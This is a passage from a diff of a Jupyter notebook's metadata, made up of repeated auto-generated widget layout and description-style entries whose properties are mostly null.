null, + "overflow_x": null, + 
"overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6f80b1fdc1a645dda301f305c3fcfa3c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d5d5d1041afb49fba74e2010a8b517ef": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "df4a6c1954694ebd9078d2bbce331c0c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d6ea703fef6a40648d33940ea0533477": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + 
"674f1b434cc248398e785c641cccf6a3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "712af8b20d414f7eae375231b30ebf93": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ff5753360adf4971b513dc197a10ba12": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "472b0409a6784d7e8595d430074b4976": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "fbf924f270ad49b4ae7fe6d33f3de998": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + 
"model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e1869fb4d1a54d7b91db2a714bc8ab69": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e99040a596774e35b013e07b97d59aa6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "416e7a5741484457b37ee2cc6cb46769": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5abc6dd6fc8a42cfac748645d7d5120d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + 
"_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f0571918d4964cb0a4e8c78b7dc5b81d": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ee01fb5c76c6479a9764e8e8c7deeb24": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "dd9432faf01e49f7b645575d9422a4df": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "b11bbb17f64a4cb88670c3251361abc1": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": 
"1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "008431306c25440584e45566ef6e2ef3": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5b64a9e9922f406f8834ebac63a09ca8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "682288ea4e1440d3974262dfffefc51a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8dfc8df4b9f241cf901c3fbb86554cd8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "68a0bbe8687e4db9b87542ef7023345f": { + "model_module": 
"@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "70a89485f8eb4c9680ccdb6e20041f65": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "6009ba22e5134b42a48038970f8a8087": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "25374e0a7ab5466bbcedf7cf15974c4f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "3be07a9a36c14e609506a8d2ac30439a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": 
"@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e43a24fb4e5c4fdcb39febd5fb66ab45": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "13942a8909f945c395d55f92033505ff": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "51fc19877c544160ba1f98487b04d612": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "eedd93a671824bde815adb53be8171d4": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + 
"_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "b02ed3fb150a4688b13ebcde50c08ffb": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e03e968d53544e44bb8aee7f544f1bb7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "c4e4e8e3c9d748ffb96f74c1e7d06456": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "6e467383b0df416ea690cbd818bceba2": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + 
"align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f4e0a99311504204a79f48de9ec95280": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d8fffd09966f40cd8f443d6083121fbf": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "2fa658f90da941b6a590c278c67e548e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "32a25d57545340c18731eb25a79e8b47": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": 
null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f0da6d221d02448bba7dc60802325cfd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e17a16c5dc694b899e1e44f3be7583e5": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "bd92677245d34eaa9245935dd5a20932": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "4b9b4d011c1c4ccc886e6141ce25f235": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": 